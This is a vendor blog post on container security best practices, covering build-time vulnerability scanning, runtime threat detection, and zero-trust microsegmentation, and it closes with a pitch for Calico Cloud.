Container environments are highly dynamic and require continuous monitoring, observability, and security. Since container security is a continuous practice, it should be fully integrated into the entire development and deployment cycle. Implementing security as an integral part of this cycle allows you to mitigate risk and reduce the number of vulnerabilities across the dynamic and complex attack surface containers present.
Let’s take a look at three best practices for ensuring containers remain secure during build, deployment, and runtime.
Securing container deployments
Securing containers during the build and deployment stages is all about vulnerability management. It’s important to continuously scan for vulnerabilities and misconfigurations in software before deployment, and block deployments that fail to meet security requirements. Assess container and registry image vulnerabilities by scanning first- and third-party images for vulnerabilities and misconfigurations, and using a tool that scans multiple registries to identify vulnerabilities from databases such as NVD. You also need to continuously monitor images, workloads, and infrastructure against common configuration security standards (e.g. CIS Benchmarks). This enables you to meet internal and external compliance standards, and also quickly detect and remediate misconfigurations in your environment, thereby eliminating potential attack vectors.
Securing containers at runtime
Containerized workloads require a granular level of monitoring so that IT and security teams have visibility into elements running inside the environment. Because containerized workloads are highly dynamic, issues can quickly propagate across multiple containers and applications—so it is critical to swiftly identify and mitigate each issue at the source.
To secure containers at runtime, you should monitor and detect anomalies in network traffic, file activity, process behavior, and system calls across your workloads for broad visibility into runtime threats. Assess your containerized workloads against IoCs and IoAs for known malicious activity, and use machine learning to implement a behavioral-based approach to protect against zero-day threats. Use a tool that allows you to create security policies to block or quarantine compromised workloads in addition to sending security alerts to your security operations center for further analysis.
You also need visibility across the stack from the network layer to the application layer, so use a tool that gives a runtime view of the workloads in your environment with context on how they are operating and communicating. This will allow for faster troubleshooting of performance hotspots and connectivity issues.
Reducing the attack surface of containers
Because cloud environments contain a large number of containers based on many different underlying images—each of which can have vulnerabilities—containers create a large attack surface. To reduce the attack surface of containers, you should focus on threat prevention using a zero trust approach (i.e. a deny-all approach). Implement granular, zero-trust workload access controls to control the flow of data between workloads and external resources. Examples of this include:
- DNS policies for fine-grained access
- Integration with existing network firewalls
- Using IP subnet/CIDR ranges in security policies (i.e. limiting ranges for egress and ingress traffic to/from workloads)
Microsegmentation can be used to isolate workloads based on environment, application tier, compliance needs, user access, and individual workload requirements. Dividing workloads into distinct security segments allows you to define granular security controls for each unique segment. Microsegmentation is essential to reducing container attack surface because it helps isolate endpoints and prevent lateral movement.
Something else of importance to mention is that, unlike servers, containers are designed to be ephemeral and lightweight. You should therefore avoid adding too many files to your containers too often, and be sure to update your containers on a regular basis. Ensuring your containers are regularly maintained helps to reduce the attack surface and avoid a weakened security posture.
Continuous monitoring, observability, and security
While containers offer many advantages, they pose just as many security challenges. The immutability of containers (i.e. each change to the application or microservice involves updating the container image and launching new containers) makes containerized environments highly dynamic. It is therefore extremely important to ensure that all components are secured from the initial development phase and until the end of their lifecycle.
My best practice suggestions in this article propose that the continuous monitoring, observability, and security of containers should be built around three main pillars:
- Robust build-time and deployment security
- Runtime detection of known and zero-day threats
- Zero trust workload security to reduce the attack surface
Architecting your container security in this way will help you build and maintain a strong cloud security posture.
Calico Cloud provides zero-trust based security for containers during build, deployment, and runtime. Try Calico Cloud for free with a free trial.
Join our mailing list
Get updates on blog posts, workshops, certification programs, new releases, and more!